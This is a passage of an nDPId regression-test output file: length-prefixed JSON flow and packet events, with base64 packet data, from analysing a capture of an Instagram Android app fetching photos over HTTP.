nbdS4duCJorHU42r7hqMKoMQCnCeAuojkF0F8BRBzhkEpcFpK6im5sQ5GRJU57qi78tptbhTpBzLHQKE7qrwsdX4LS1+Ts9Uc1YWugWOruCfoFCwtRydla3CsLCo7DIlTl6FQm6BQnWuoT9DwSpCoS9DwTdA4JVrqE\/QKOx0ChM6u5EjoeCVY+ZIiIA="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1436720900717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720900717,"pkt":"ABsv8H60QPMIw47hCABFAAA0wXFAAEAGQ4LAqABnLiFGoJegAFCP9SZop0jbaYAQH+o19wAAAQEICgAD63Sa3z3b"} -02375{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1436720900744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900744,"pkt":"QPMIw47hABsv8H60CABFAAW+u1hAADkGUttSVRqiwKgAZwBQ4lApkhzMOpIM7IAQAku18QAAAQEIClYLL1sAA+txSFRUUC8xLjEgMjAwIE9LDQpMYXN0LU1vZGlmaWVkOiBTYXQsIDExIEp1bCAyMDE1IDE2OjMyOjE3IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogMTEyMjY4DQpEYXRlOiBTdW4sIDEyIEp1bCAyMDE1IDE3OjA4OjIwIEdNVA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0xMjA5NjAwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/+0AbFBob3Rvc2hvcCAzLjAAOEJJTQQEAAAAAABPHAIoAEpGQk1EMGYwMDA3NWIwMTAwMDBjZDFlMDAwMDUxNmQwMDAwYTY3YjAwMDBkMzhhMDAwMDQ3MTMwMTAwZDU4MDAxMDA4Y2I2MDEwMAD\/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoHBwYIDAoMDAsKCwsNDhIQDQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIUFRT\/2wBDAQMEBAUEBQkFBQkUDQsNFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT\/wgARCAKAAoADASIAAhEBAxEB\/8QAHQAAAAYDAQAAAAAAAAAAAAAAAAECAwUGBAcICf\/EABsBAAIDAQEBAAAAAAAAAAAAAAABAgMEBQYH\/9oADAMBAAIQAxAAAADRJrP1fOIlpAgZgklAaSWREiWQ0hYBBKMG1GQ0mshINSQNKwDZqISVGBpCiEDBAlSiBIUY0GoAhRgEhRMIlm0hLpRTallISS1AgnEASgbEmowbUamIMzBKgaCCgBEs2NLM2INRiSFhiApTEksNJDhobBqHjA10yQHEiSSgCQoARGYJBhCQZgklkCTCgQThDSSzabMzAkuECSUY0gwJJmbEGogIGpiCWaEBSgbNRAk1hiCcJCDUGkGshpCjEkKVJthagbCzEgKMEmYAjNQICzaaWoAhZmxAUYIUZySQsAQcITZqJSxlGVMgDAJCwCUrCEBQYgwoEBQQkzAJBmxKXSBBmbEAGggowSlYBIcQJKloYRrJCQtLEmsASVhiA4kRGYGQUQkk4AQsEwgswbNZNESw2kzUk2awBJdKQg1KQ2ow0ROkNBOpEk1BhBZtEDMASgCCdCMMwuixAcIEBYE2HEjbNYBBOkNAUoSCWTaTCiKSWBthwkkBZAQUGINwDaCjkkhZobDgBCXDE0pYbQThobDiXEicJjalhNIMCSayBCjAEa0ySQ4QJNQYkzMCJYBBrMEEpQIDokIJwkIUoMSToBClAEGtQkEs0YClHRYk1pBIMwbNQYgnSYgLIEBwkICyYhS0tJCxFthwmkKMASVmhAWbEE4TSQsgIGpNBLIRBQaQayBJOAEBwMQFpAkukCQsAg1kwjMMCVgRGahtk4ASFmDYdSCQtbGjUbRJdAkBZDILMTalGxBqU0hLiYmGDXVNCjMaUrANmsIQlZttqUY2w4RFAcShClECQoCSlwmETgBsKNMgZsSTpAgKSIlGYICyESVkBBYBBqJog4E0E4TEB0gQHA00FqGlLhuKTNQINQJJJZgg1KY2ZpImFGNJLDSTWQIWFASXDBBg5BGoAgOEGEajpmg1hCCcIEEswQl5DSTM00EswQFATalGCCUYJJRg2oGCQsxoSswQow0lLgQhSgCDUGkBYEkOEDYdAIJZgk1ESQpQcUhRsSFGCQZgklgEmZg2pZyEBZgglmMiWQkhRgkOBoicSMiWbSDWGJNQBJOAMAKVVMgYiIUahNE4Y2wsNICwNCXUCIlmDRuGk2S1NsLUYIJwRbZrDSAo00GsmINQEkk="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1436720900745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720900745,"pkt":"ABsv8H60QPMIw47hCABFAAA00CZAAEAGPJfAqABnUlUaouJQAFA6kgzsKZIiVoAQH3QuLQAAAQEICgAD63dWCy9b"} -02366{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1436720900872,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900872,"pkt":"QPMIw47hABsv8H60CABFAAW+QeVAADkGzDdSVRq5wKgAZwBQ4m1aOHmGBPBEEYAQAktTqQAAAQEIClnq0tYAA+t6pEVxjNbEsTo05BJiqWC+y9Cm00IuBsqQ3OjXYmls3ooNNijoaA4JvaGXA6WBNFUSNxldWicRkqfSvQ+ysT9n0voZ+EyJR6Oy8JFg5mjiK3jhnpErGpjhG8skeRODdCdQ2MDy8miGRvQk1oSZFhVmGQ28jcag3sVEigomNJgo2R5DYnSdEiIuyPaJg2JvQlTQl7HH2PCFhjS9CYo0RCdlSaY2qVbA7SVlukMk60Nrou0FvVb7YyZLsTJUNNjXYcKjL2NNBHY6YRIqyEsm+g1byhIVtLCoTuULeROaIZSg30H1KXibE4I6MNQaNsuwl6EmkRW2hNPKHVGvY2h4LXCptXgsREUx4KkzYc6itsZrGceuCUwiNvZ0NlpU4bHVgOMeBQT+hXsW4NkxniYRKY0LOGPOuJ3wxvNY30XInTbyUHSrYx3BbGhCWhOLAjiZyQZFUJdjY3cIt4ZOkJvIlCy+hRiRG+RuPBllCy6VrIsIWMN5wEbUZGNRwXYxYMsCZvBM0SI+CRpDbsamyBbROyZoo8CJEl6E9mJ2S8EM3LEKN5FGYSlBs8UdkxmA2mpRC0zPZ7xJ9CwL8H7GJMEIRrTFqwKrYnyiJkSFrOodENU0wTGWNK2jlI9lfZlilokuhJLsxJCYIN4hejdRoOrIspMTJA01hjZUKPFINeESqCUMEQXvhWETJONsmi4g1wbPQfoNvgSpYMGCvY9YNIqvA3SQSmRLI4YPo2XNMYImYP1DY4jPgTTw2RtDTZj2bUhs0VbI6JdDjHkaG0not6KSwmmsQgk2Q2d8EY0NThbnDb6LikplbG2dZcC3WN4yZoyEhYNBej0BWx7I90tpJlyN42ZDbInnJ1C1j9i4ezDdGzUCRBRluhyJbIYWhtD6NOhqmcKFroh5EphFtxoj0LHA27N4EuzbHNiablHlZGpBOsMNmxNFXQsIyISmhtLI00bJ7F+j1S+jDRaWi3vmNnZe2dMzFsHjJciezaGpgnsUwLB9OsnZ3niE9jVXaWBDK2XAvaENk6N0ekQ2O9mkVid2JeCeikitCaY2qSMSexWxPhK4FBtCR+iXk7ssgLA2L0SCdTorMmVWF2XC0NTE0Jx1GuCltCJQTg1LLSyaM2UJLoSF6DFF9Mw9kaL7IKmI4MmxmzPiZWtisp9MNxiCdRNs2PYXFI7EHTI1SpITxUMwngXpkyZLmoTeRzsWCnZ+DfRVtifokzCxuYoykLQuIaLckmHw90WsHeOLnJ84eDeStIr0XApBloXsSFOuGxPJSo9D4JV5INNsaqEnFWmLKwNNiDhZETR+8N0hPQnDfQ9jUeRJC3L2abSUYrSyXKQvTLUJ0TMDXTG22NpLA+h7pbgbPbEFhURZQjQj9GNi+DZGcFGLsjYTTQlYRp28M2yQyxotDecoU0R2IEl2iJYG4illoT0E0yNMauOGKUSPA0mRrZpNHQ9mUtCe8LiDqwZ6FGTD0YCawPKG6VPR1B6om0oVtJszsT2oPLg1iChibE3sd6Emqj9QlcmEXhv0J3fFLW0UaJbG7obENhs2LInSGhYWLA09oR2MwU2WaOiiYyFETeCZiGhtrYmeGRtwUYEs5HJsYE8FFhHQyA82YMmWhvJ+luERPJpCaXRrgavgriCd7HBcZJXUMHg9aNwpE0U5guCZyNlQ8sSjo1kSMsTUUFRQbOhYwhtnKP6SOXI1R12JOnuIeq2VMpZgm+hdg0iYglGUXsWqM1gbLTRccdQh6Ku0exnodIIyzBObLeyzRbgl2MPIvcF+DTaqR8HaG7s1kuabRjJ0TpPR2VPJV7KLKyJPRF0V2DRrKEZhaNsjpZo9uNoKHwaJdi0JwbUojVhqtMTJ4I0NdDcP0bBkIaxSOjsCQm08MyRGoPKyP2uPoVQ="} -02372{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1436720900873,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900873,"pkt":"QPMIw47hABsv8H60CABFAAW+QeZAADkGzDZSVRq5wKgAZwBQ4m1aOH8QBPBEEYAQAktstgAAAQEIClnq0tgAA+t6yOoxEtjJYMe0j6G03geIuahaK1oTHsEliMMTZ8IV3w+jNLnJcKpRQYoNH0Q1owU7ElIg1BvY00M1sKh00GrYYaKmxapIfSuhKlliV5Ggz2ZEdUXqEuURYhcRmGdF6HkVYKkoGKmh3bGvRvDFLCRD9sysMedkSiftieCrscIysGDeGZuR52JNFJwy1gdIqmuE8SC43k2NNmXvnK0LZ7Q9kdYKlspkg9CZoqhXWJtbKpgafXBrJWhOsqdlcjGlMIf02UEyYUEoN\/R3BPJjY2bCG2s0iEvRRNQ+jO4xqKDwyI0ohahosjThi9BIrI7gehuDWUCCJLBXotaGI3Qlg0wJ4IVBKoTow2PA\/UqeR2ILqdQ62OGMraO4hekPhuNoceBSE3cCJmskaK+hP2IZK1kxs+D0NwaUQbYMYurNlQeMoTLYsrBUslTyTGB4bJjIpUh1Csyxlol2o3gucCaI7VzLkaJHRLOOI9DqwQy9GXvictCZRvBROF7M75lwMNqMbA1Q7yIm8GJWsFybGm8jbOi8hKnkr2M2jAtIEustYo61E\/YmmP6L0b3whJbGvRDYcGUzATfFIDVQIw2Oobux01kTo0N6FINdmGBYdKOUophoRJtodkbFVo9gsdiVGqholRuBaWjGKEmDKSSFXnjQZrsSagmHGQ2V6YSOqJlWjZkzB3BjS9mOWLBMSDwqGspicFTSY2vRnKTsOEJT6izJU3UzZMYLFNbFHhcKrhEElmjUHgsGw3eFliqL7LktKtGhuCzshGkdcMxokwNDSEy0x5WRazwkNsaY8bLNjG6JXCGsDRGmNiieYQKFSLNMh9GJBBqDcYmQ\/TLYs4Y5okeCCq6KrROsWRPA\/QgqexNDwJeyORUtLVhijncHacZgTImKglDuKPKPiNMVuBBPFGsVisByZlsa7HsdRZxjrKIyEiLkwMS2JuxPlJTJB8H6bZlkrSN1n4byX0J4EzWxRB5yNNiRbIpUIU6KJCXaHjR8G5KJ9CS9nWBuYG8YG6i9HshCfoTL7I9i9svs2S0igzvAmIqQvhrDHLkQf6KrgpKCatLEWjeRJbOsDeINKDg0ui5F0zaibWWN0bpi9BWZoEHKMpILVMCwVlji1gwwlSnhCVWC+iHqDPofxpWqTM0eNJ2xqh8YRjmCGxosC24xO6HlDsYiabHsVY3Q2j8FwXDnhHTop2I0ZBKKmqh+g1MksMLJUzHQ4tCWBioqFxpAlEhOSDo8Dagmn2S4NI9pDj9P0qphlFmxt9ob7Q4fDeWdIS9mSomrgesCHk9xVyISbeBYZYqOnkRY6Qi+xNoTGi3wtcJ8IdEGuiiJs+CUCzHWBIwyehKjUWCjSYQ2xehJQkV4bmCDSE3ajpBI9MbbKsnYhMqSE6SoSmxVZQz7F7Cxw52a0Oi4wa6G80SyNISCZNs1kTWjAjbEjBSIX0JgVNEej4YLk6FUNkLSpOMieS4G8EdEeg2KpGUxUsEchDaYw1FYKjISLZtH5xdj6MjnZrR0KQaPJCYqtCpZNBN3Ym8GJNCRoeRqPAyVRi2Jvp8EoJ4hRsvRtEZTjFNsRZ6Lg1GM+iyL6KpBqRssXcg5w2Ui1l6HGqjFFnaPpYhNtEfI6Fk9p+jWy+h1jWBucKo6btHQ1cIbLY6jKwI1kTtCe6OF7GyQ+luTvB+OCeRZE8Cjzw\/QQ2lsbbGNL0REErSTiKuDRksFTw2JZIJTbY1oaZGzXwTzsbdEiLmog0Ji7YqmN+hroiag0PQeUVDI9mcQw6G101ZROVMQtGQ7eH6WaIbNDwsDsK10NpNDbcMrspisEOJISYYqTRU0RDqgVWGQxaXIsvmpFmWPDA8JDDqHRSQsC9DYnnBYhpbF9KmJvaYk7Ktm8jfrhZcJnL5r4twNjbk="} -00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720900692,"flow_last_seen":1436720900873,"flow_idle_time":7440000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3095,"flow_avg_l4_payload_len":1031,"midstream":1,"thread_ts_msec":1436720900873,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-f.ak.instagram.com","url":"photos-f.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11424623_1608163109450421_663315883_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} -02391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1436720900875,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900875,"pkt":"QPMIw47hABsv8H60CABFAAW+G2lAADkG8rJSVRq6wKgAZwBQrVt8zLRbo9aCTYAQAxSDewAAAQEIClRjBa0AA+t+qDhdSVH1chUH1JtbCJY\/b9U\/35z\/AIcB2iAbyHujCEFNZ+I0eU8EOIX\/AEB\/qRwVo9Wlp5znKiVYRroroyxNdVdiE6kdYXRMS3KcwBs+EyuWZYuo52fCGCiRaGhDCm0eStltza5zDLVQe2oxt2qbSrdR5pHTZPJaAK7JTxSrekwfflKFROdJwg5Y1CyNVSaHSVxDS0CVTMOVI9v3UgC122i67XHxCfXa5p2RquKuPMJ1XpUxG6NIvp3blVKRpiVRMtCZ59+YOFU7DcnU6dTOhRpECHZCLSwomfujLIK9xojog5ZGQgQ5VGxza\/YotDtEQRr+RTZe72UhDK0U\/Sg+fuESn9pT0VTtKEFOlWOQYBlU6VNyNOjonUmH0p7LdOTSD6k6C1Oj5p\/wckoMOHKYPO3tlU9WFVKbrygB07fGU4txhOccQn+qSgN0CjqgJbEqm5ow5FksvA7VeZ7f3Tajd904VNW6JjQ5ncntFPTPhDtGVPjVZB91ncoRE8oIyp5N9S4cEODlVJp1JmA5fEBxtqYKqUOqP+\/zSg5U2tcI3K4r1W6whjKbVcNE4l2TyDtij7fIFHV4f3CoGWKuyWKj6ICHjmTYVF4grovG6HUCdTvzon0H6hVh+C1MMIt8ICE07KNwg+cFOZuEeTXFquDtU5vj5onCADRCuEIOGmi9bcI9qe6Hh\/lSnr\/LyBA0QtO6w38TUIwWwCvsgy3VFt7sqxzT7KwyZTqc5blYj3X06flx+dK1UrEqM45DARcbWwqkkymmJC+hEywLVAnRSFLZ0Uh2F02s75QrdN3lqFtZuO1OGwcuGqOAgqpFMWFAx6lcXdgGuiNNzYCtMzGE+FGJWdEJR5BUG9p91xTbqM+Ewy22pp5VKoaLu4\/b5BzCouE52V4uc5eoyu2IHzQgtMrhTPaqXY51NHLYVLteWrXnUbcEx1pUhytVgUIjzlVKH10\/2UhqqcmlOQfGqIDtF7I45NMpzflptJyiG\/dbyiJTaj6ZTiKrbmo5ZHhMMtRKf5RzypychE\/TsrBP6osiBO6jfYoVBq4Jz6ZGNEfUA7KqOaIsRYcFuUx8DCcaZ9QXSpu0cjw7\/pyoI1\/xGLV7rflJtjkMIOwg4rTVSeRlD3WuyIIAXoy5qI\/DENgr4jNzxlPqdUrUhEuZmFfdl26N8xOAjGpXr9KDMp\/b2cg5m4lf8u76E2rRtxKi+mQqYlpb4VNj\/S8YREfJPzBEfKCVMohcObXqr2Vg\/wAoZTxbXnyhp8j25QMIOKL0AdeU2PhcRSg3t3TXfS5FiaY1TvI5B0JrhqnsZU7giFog4OwU4cxkwtBCPLZaoE0nIgeoaJuJatkdORVDu7Toi3xGE7KLogHZdS37K7Ca7OUXI936Koe0CUDyCBTg2qId+6LS11rvzZ\/KZqoJ5brPLTlEqFoVKuOCobMhCqWm1Q6YKtduV+OT5hOoPnKDcL0EYwpFTRQ3Mp0GIELLsnZXv0CudC115sBLwAumQ2Vw7vxLTo5VPwqxxKbWp7ynCfyJwpUrqNIh3yxATdVsqUmqFUZ1GLh3EiDsq7e27wm6IhBQnBQoTGSZPIhVh23eFh7IKLc2ldzcFEbpr9kfPNr\/ACqudEeV550hHepk45Bao6qoMSqTx6XJ4teObhypm39E24i9wQd3SVUI2TsnKnZXYgrJ0TO3ITjPIK5XJpVRvVb77f4WZ5M9QUG4hbcsrbkFK+3INkwoA7TsrTspB9WEa3bnXyu5xl6p1XUk6qXbo5gxgJ\/cwRsi0jVNBQLtxhXSSSnFzk4QMr6UQYley4MfidR2jVVqGpk4b48oVXdZrzsuNbkOCHDuPc7tHvycN\/ywOYTlupwuHbm9bJ3Y8P8AKIuCpnCBwsSgii1WocyEzwuKp4s="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1436720900876,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1436720900876,"pkt":"ABsv8H60QPMIw47hCABFAABQv9ZAAEAGTLPAqABnUlUauq1bAFCj1oJNfMxlZ\/AQEUsuYQAAAQEICgAD64RUYwVLAQEFGnzMtFt8zLnlfMypR3zMrtF8zJKnfMyYMQ=="} -00964{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720900690,"flow_last_seen":1436720900876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3095,"flow_avg_l4_payload_len":773,"midstream":1,"thread_ts_msec":1436720900876,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901182,"flow_last_seen":1436720901182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1436720901182,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1436720901182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720901182,"pkt":"ABsv8H60QPMIw47hCABFAAA0W\/BAAEAGs3DAqABnTUMdEYS4AFDrYaSj8+woZ4AQH+origAAAQEICgAD66NkobAz"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1436720901182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720901182,"pkt":"ABsv8H60QPMIw47hCABFAAA0W\/FAAEAGs2\/AqABnTUMdEYS4AFDrYaSj8+wze4AQH+origAAAQEICgAD66NkobA0"} -02385{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1436720901183,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720901183,"pkt":"QPMIw47hABsv8H60CABFAAW+nH9AADkGdFdNQx0RwKgAZwBQhLjz7DN762Gko4AQAq9DyQAAAQEICmShsDQAA+ufWEdJBRPnaSmosKHYDmQEyGHV3GAwTrGe5kQxyGEYyxmyELBrJc+SMi3dmmwq1mAYjd9asgZG6SWIbmuecSeibLvJUKPOw0JlNLd+SsFoR4AyWWZMuWzjy22t8lg9nL1yby0j7G5yGHP2UfvrthqhUQLZPhRPRii5ZImLbbxtBh75Nwi10QstpiiOURwgsk\/gse0fhODW3xEaIlCTuwGMxEsajO6KBwgVZE4oD8EZJ8CUI+IftidbAnEAzCB+CxiXeSUkT7I4PLvoy1NnMNCUuGI63ybZNQBpkMtmgmFlmfthxhK9DguCw4XPNprshLbUVoAbHdBaG0WibQPaUDoawN0QnEMFu5OOsEXu+c3ydgozRy0R9FbV0F8hsoSyHLIicGyGMakQqAYSTks8J\/2+\/kORfizOWuAtMcMCSaUPfEY6f\/ttodWXWPLX7bzs5o8i2FH5IZ4wLEpEOhwV2MADYJIWDBmF9CQdn6hh1kzmvWM7b4SuFg+iI0QmrTgRgMl\/rAMZDtwdyKQyk+DPksJTgtrhZZRA\/GY+X2oyKfiboDY0NouOzUthrGCw4ToWxqMKM+rf1sDDAEsjSzJB7rCfcDOwibANVH23SwWhh5rFCY04ksXdhurOKpIBQXzCwN2yHF8S1j2hc2z0kMsCW+OeS+e5HaaRoyzZaCzPNrgnwkhY7i8yZQkeMkH4woSzgHZw7AMoJTs5nD21BiRDuFCBqB4lGX+kk55UTfE62aMJ9jBPBhqltnyYDTEarQKEsWGbVjV7cRHRc\/JgmbZkQlW0YI\/xZdFg6wN2R+J3fOBbBmIcOvB5bIKiWTEFFXRESk7pA\/G3UwXXKB8XDGTJIAkPv49GZuMRZBkC+FhZzCzZ\/iYJh8LIJjV10uzY7Q6E8RpFbyee3Ru25UC5ETbDsFPCaR1ZZC+Qlrsu3Z2QOnm5Ijct96wHLCiQoCUx5CFCGTynRCNjadMyB8tlLRKCwv7KX++dvy1I4Ngs+X8bALTsRQ81XIDydJihBYicmO+O5EykyOu25b+jIYCOXX2WfISuvyX8JiI2GJxqYZEg+OZPoDhxBrn8TYtguClNRehGIQDtqZcwjb\/V86w0sQMOHMZzpnYBjpA8i2eJoGlmik3CQHHMRm8DxLkyFvCZWDFGTUEVI6mHEnfCoaSoN+\/pJIKAlCT4XxDOVC6F8g19jfq1eEJAj0k3u3yFtEJC0DXJolurtJkzJ6y5KHJWSGujZ7ucFS0YjpIoSX0blPAySPJvg33fP2OLma7cQ\/o6PyUHgctick8cobWRNWzIJG3koi8vkKbBIHEMIhdatBUZ40kmN4wtVBz4xoAKljf4v6tXAUt\/sabl0bLkuRE5KikyGgBCbojsrcdwSEGEBomIUFpEl4TvPOqQ8EQF08if3O9FnhnUw2jwQHpaPsw+3EzgNs0zWy6OB623FWGwH7yRctwfDWnw6uSz7AvbHpmHBs+lzanaBkBBq2DLF24dyAfJ1fyW2F8GD9sWLVnjCGZF3EsLst8bQIxxKOwYkoOS2WRsw0xVMJlnywe3Dcc8w+9gQNiBfxyDpYA\/BXzFgEQ3SDtI\/Iov2XBZk1lmPY59tj\/SH+23V5dy\/iiOkLW8UdeiSozNTMFJIdoa309Kn34h+DTnlxZPJVqKRj7du3Uk37CetFC6vFxS2151HHC6aWXemK7B3BpAILjJ\/RL8v0ZA5dOz14w3bAaJWBEg+oUMkesS4WzNnMtGFzWDqZOmcWARMZvW5QUXehDRGok1aYS2VUwcI4nRFkmR4HYk3YsQQ7hbSjts4wBuESi5cIWAPkICk+lgVslThZsIux2ZS+mHik4DwoYI7IF8QlYXTsSiw2By7i5s7AeQhpAzljeQfkQaQPQMK5P3IVCAQHZWMgI="} -00966{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":255,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720900690,"flow_last_seen":1436720901259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24614,"flow_avg_l4_payload_len":769,"midstream":1,"thread_ts_msec":1436720901259,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7440000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1436720901262,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00816{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1436720901262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":324,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":324,"pkt_l4_len":290,"thread_ts_msec":1436720901262,"pkt":"ABsv8H60QPMIw47hCABFAAE2VBZAAEAGt67AqABnUlUamZHmAFCdoJYSxR9Z0oAYDfbnvwAAAQEICgAD66tZ6cc2R0VUIC9ocGhvdG9zLWFrLXhmYTEvdDUxLjI4ODUtMTUvZTM1LzExMjQ4ODI5Xzg1Mzc4MjEyMTM3Mzk3Nl85MDk5MzY5MzRfbi5qcGc\/c2U9NyBIVFRQLzEuMQ0KSG9zdDogcGhvdG9zLWEuYWsuaW5zdGFncmFtLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogSW5zdGFncmFtIDcuMS4xIEFuZ